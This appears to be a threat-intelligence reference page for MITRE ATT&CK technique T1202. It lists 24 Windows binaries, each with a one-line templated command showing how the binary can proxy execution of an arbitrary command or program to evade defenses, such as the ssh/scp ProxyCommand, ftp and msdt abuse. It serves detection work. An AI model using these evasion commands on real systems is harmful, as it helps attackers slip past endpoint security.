T1202Tactic: Defense EvasionOfficial MITRE ATT&CK Page

T1202: Technique T1202

Adversaries may leverage living-off-the-land techniques (T1202) to achieve execution, evade defenses, or transfer tools.

Total Capable Binaries: 24
Windows: 24
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1202

Across 24 verified binaries
Windows5 payloads

Bash.exe

File used by Windows subsystem for Linux

Sample Attack Vector:
bash.exe -c "{CMD}"
Windows2 payloads

Conhost.exe

Console Window host

Sample Attack Vector:
conhost.exe {CMD}
Windows2 payloads

Diskshadow.exe

Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).

Sample Attack Vector:
diskshadow.exe /s {PATH:.txt}
Windows2 payloads

Explorer.exe

Binary used for managing files and system components within Windows

Sample Attack Vector:
explorer.exe /root,"{PATH_ABSOLUTE:.exe}"
Windows2 payloads

Forfiles.exe

Selects and executes a command on a file or set of files. This command is useful for batch processing.

Sample Attack Vector:
forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}"
Windows2 payloads

Ftp.exe

A binary designed for connecting to FTP servers

Sample Attack Vector:
echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt
Windows3 payloads

Msdt.exe

Microsoft diagnostics tool

Sample Attack Vector:
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE
Windows3 payloads

Pcalua.exe

Program Compatibility Assistant

Sample Attack Vector:
pcalua.exe -a {PATH:.exe}
Windows2 payloads

Pcwrun.exe

Program Compatibility Wizard

Sample Attack Vector:
Pcwrun.exe {PATH_ABSOLUTE:.exe}
Windows3 payloads

scp.exe

Used for uploading or downloading files over SSH.

Sample Attack Vector:
scp.exe -o ProxyCommand="{CMD}" . localhost:.
Windows2 payloads

Scriptrunner.exe

Execute binary through proxy binary to evade defensive counter measures

Sample Attack Vector:
Scriptrunner.exe -appvscript {PATH:.exe}
Windows2 payloads

Sftp.exe

sftp.exe is a Windows command-line utility that uses the Secure File Transfer Protocol (SFTP) to securely transfer files between a local machine and a remote server.

Sample Attack Vector:
sftp -o ProxyCommand="{CMD}" .
Windows3 payloads

ssh.exe

Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.

Sample Attack Vector:
ssh localhost "{CMD}"
Windows1 payloads

Unregmp2.exe

Microsoft Windows Media Player Setup Utility

Sample Attack Vector:
rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
Windows1 payloads

Wlrmdr.exe

Windows Logon Reminder executable

Sample Attack Vector:
wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}
Windows1 payloads

wt.exe

Windows Terminal

Sample Attack Vector:
wt.exe {CMD}
Windows3 payloads

Logger.exe

A logging configuration tool from the Windows Kits used to start and manage process logging.

Sample Attack Vector:
logger.exe RUN "{CMD}"
Windows1 payloads

OpenConsole.exe

Console Window host for Windows Terminal

Sample Attack Vector:
OpenConsole.exe {PATH:.exe}
Windows2 payloads

Procdump.exe

SysInternals Memory Dump Tool

Sample Attack Vector:
procdump.exe -md {PATH:.dll} explorer.exe
Windows1 payloads

Vshadow.exe

VShadow is a command-line tool that can be used to create and manage volume shadow copies.

Sample Attack Vector:
vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:
Windows1 payloads

winfile.exe

Windows File Manager executable

Sample Attack Vector:
winfile.exe {PATH:.exe}
Windows5 payloads

Wsl.exe

Windows subsystem for Linux executable

Sample Attack Vector:
wsl.exe -e /mnt/c/Windows/System32/calc.exe
Windows2 payloads

XBootMgr.exe

Windows Performance Toolkit binary used to start performance traces.

Sample Attack Vector:
xbootmgr.exe -trace "{boot|hibernate|standby|shutdown|rebootCycle}" -callBack {PATH:.exe}
Windows1 payloads

XBootMgrSleep.exe

Windows Performance Toolkit binary used for tracing and analyzing system performance during sleep and resume transitions.

Sample Attack Vector:
xbootmgrsleep.exe 1000 {PATH:.exe}
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point